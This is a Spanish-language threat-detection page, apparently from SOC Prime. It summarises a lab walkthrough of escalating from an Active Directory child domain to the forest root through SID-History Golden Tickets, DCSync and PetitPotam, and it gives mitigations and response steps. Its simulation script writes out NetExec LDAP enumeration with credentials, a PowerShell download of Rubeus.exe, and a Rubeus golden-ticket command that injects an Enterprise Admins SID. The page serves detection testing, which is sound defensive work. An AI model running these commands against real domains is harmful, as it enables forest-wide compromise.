SOC Prime Bias: Crítico

01 Jul 2026 09:11 UTC

Abuso de Confianza en el Bosque de Active Directory y Escalada de Niño a Raíz

Author Photo
SOC Prime Team linkedin icon Seguir
Abuso de Confianza en el Bosque de Active Directory y Escalada de Niño a Raíz
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Este recorrido técnico muestra cómo un atacante con privilegios de Administrador del Dominio en un dominio hijo puede escalar al control administrativo del Raíz del Bosque. El ataque abusa de los trusts bidireccionales intra-bosque y del filtrado de SID permisivo para inyectar SIDs de Administradores Empresariales en tickets Kerberos forjados. También explica cómo se pueden aprovechar métodos de coerción como PetitPotam para capturar tickets de cuentas de máquina y habilitar ataques DCSync.

Investigación

El informe describe un compromiso basado en laboratorio en el cual el atacante comienza en el pentest.ignite.local dominio hijo. El flujo de trabajo incluye enumerar trusts del bosque, extraer el hash de krbtgt , forjar un Ticket Dorado con Historia de SID, y ejecutar un ataque DCSync contra el dominio ignite.local . También se demuestra una ruta de escalación secundaria utilizando la técnica de coerción de PetitPotam.

Mitigación

Las mitigaciones recomendadas incluyen tratar todos los controladores de dominio como activos de nivel cero y rotar la krbtgt contraseña dos veces regularmente en todo el bosque. Las organizaciones deben hacer cumplir el filtrado de SID en trusts, deshabilitar la delegación sin restricciones y apagar el servicio de Cola de Impresión en los controladores de dominio. Pasos adicionales de reforzamiento incluyen usar el grupo de Usuarios Protegidos para protección de Kerberos y monitorear actividad de replicación DRSUAPI anormal.

Respuesta

Si se detecta actividad DCSync o uso no autorizado de tickets Kerberos, los respondedores deben aislar inmediatamente los controladores de dominio impactados y comenzar un doble krbtgt reinicio de contraseña. Todas las cuentas con privilegios de Administrador Empresarial deben ser investigadas, y el entorno debe ser revisado para herramientas como Rubeus o PetitPotam. También se deben revisar los registros de autenticación buscando comportamientos inusuales de cuentas de máquinas y posibles eventos relacionados con coerción.

Flujo de ataque

Ejecución de Simulación

Prerrequisito: La Verificación Pre-vuelo de Telemetría y Línea Base debe haber pasado.

Fundamento: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y el relato DEBEN reflejar directamente los TTPs identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados llevarán a un diagnóstico erróneo.

  • Narrativa del Ataque y Comandos: El adversario ha ganado un punto de apoyo en un dominio hijo (pentest.ignite.local). Para escalar a la raíz del bosque, primero usan nxc (NetExec) para listar Controladores de Dominio vía LDAP y mapear el entorno objetivo. Luego, usan powershell para descargar Rubeus.exe desde un servidor remoto controlado por el atacante. Finalmente, ejecutan Rubeus.exe para forjar un Ticket Dorado. El ticket forjado contiene el SID del dominio raíz del bosque (S-1-5-21-2964257136-1039789743-457275023) para permitir al adversario hacerse pasar por un administrador del bosque al interactuar con el dominio raíz.

  • Script de Prueba de Regresión:

    # Simulación de Abuso de Trust del Bosque para activar la regla específica de Sigma
    
    # 1. Simular Enumeración LDAP con NetExec
    # Nota: Llamamos a 'nxc' a través de una ejecución simulada para imitar la firma de línea de comando
    Start-Process "cmd.exe" -ArgumentList "/c nxc ldap -u raaz -p Password@2 --dc-list" -NoNewWindow
    
    # 2. Simular Descarga de Rubeus vía PowerShell
    # Esto coincide exactamente con la cadena: 'powershell wget http://Rubeus.exe -o Rubeus.exe'
    Start-Process "powershell.exe" -ArgumentList "wget http://Rubeus.exe -o Rubeus.exe" -NoNewWindow
    
    # 3. Simular Falsificación de Ticket Dorado con Rubeus
    # Esto coincide exactamente con la cadena compleja requerida por la regla de detección
    $rubeusCmd = "Rubeus.exe golden /rc4: /user:administrator /domain:pentest.ignite.local /sid:S-1-5-21-3430543386-541733547-1396883976 /sids:S-1-5-21-2964257136-1039789743-457275023-519 /outfile:ticket"
    Start-Process "cmd.exe" -ArgumentList "/c $rubeusCmd" -NoNewWindow
  • Comandos de Limpieza:

    # Eliminar el archivo Rubeus descargado y cualquier artefacto simulado
    Remove-Item -Path "Rubeus.exe" -ErrorAction SilentlyContinue
    Remove-Item -Path "ticket" -ErrorAction SilentlyContinue